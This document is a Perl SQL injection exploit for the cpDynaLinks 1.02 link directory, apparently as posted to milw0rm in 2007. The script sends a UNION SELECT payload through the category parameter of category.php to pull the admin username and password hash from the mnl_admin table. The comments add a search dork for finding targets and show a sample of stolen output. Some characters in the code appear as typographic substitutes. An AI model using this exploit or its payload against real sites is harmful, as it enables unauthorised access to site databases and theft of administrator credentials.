1 #!/usr/bin/perl
2
3 # cpDynaLinks 1.02 Remote Sql Inyection exploit
4 # download:
5 # http://www.cplinks.com/download/cpdynalinks/cpdynalinks_version_1_02_full.zip
6 # bug found by s0cratex
7 # exploit written by ka0x
8 # D.O.M TEAM 2007
9 # d0rk: Powered by cpDynaLinks
10 # need magic_quotes_gpc off
11
12 # contact: <ka0x01[at]gmail.com> <s0cratex[at]nasa.gov>
13
14 # ka0x@domlabs:~# perl cpdynalinks.pl http://127.0.0.1/
15 #
16 # [+] connecting in http://127.0.0.1/...
17 # [!] user: admin [!] pass: c9cb9115e90580e14a0407ed1fcf8039
18
19 use strict;
20 use LWP::UserAgent;
21
22 my $host = $ARGV[0];
23
24 if(!$ARGV[0]) {
25 print "\n[x] cpDynaLinks 1.02 Remote Sql Inyection exploit\n";
26 print "[x] written by ka0x − ka0x01[at]gmail.com\n";
27 print "[x] usage: perl $0 [host]\n";
28 print "[x] example: http://host.com/cpDynaLinks\n";
29 exit(1);
30 }
31
32 print "\n[+] connecting in $host...\n";
33 my $cnx = LWP::UserAgent−>new() or die;
34 my $go=$cnx−>get($host."/category.php?category=−1’/**/union/**/select/**/1,2,3,concat(0x5f5f5f5f,0x5b215d20757365723a20,admin_username,0x20205b2
15d20706173733a20,admin_password,0x5f5f5f5f),5,6,7,8,9,9,9,9/**/from/**/mnl_admin/*");
35 if ($go−>content =~ m/____(.*?)____/ms) {
36 print "$1\n";
37 } else {
38 print "\n[−] exploit failed\n";
39 }
40
41 # milw0rm.com [2007−10−10]
Page 1/1
cpDynaLinks 1.02 category.php Remote SQL Injection Exploit
ka0x
10/10/2007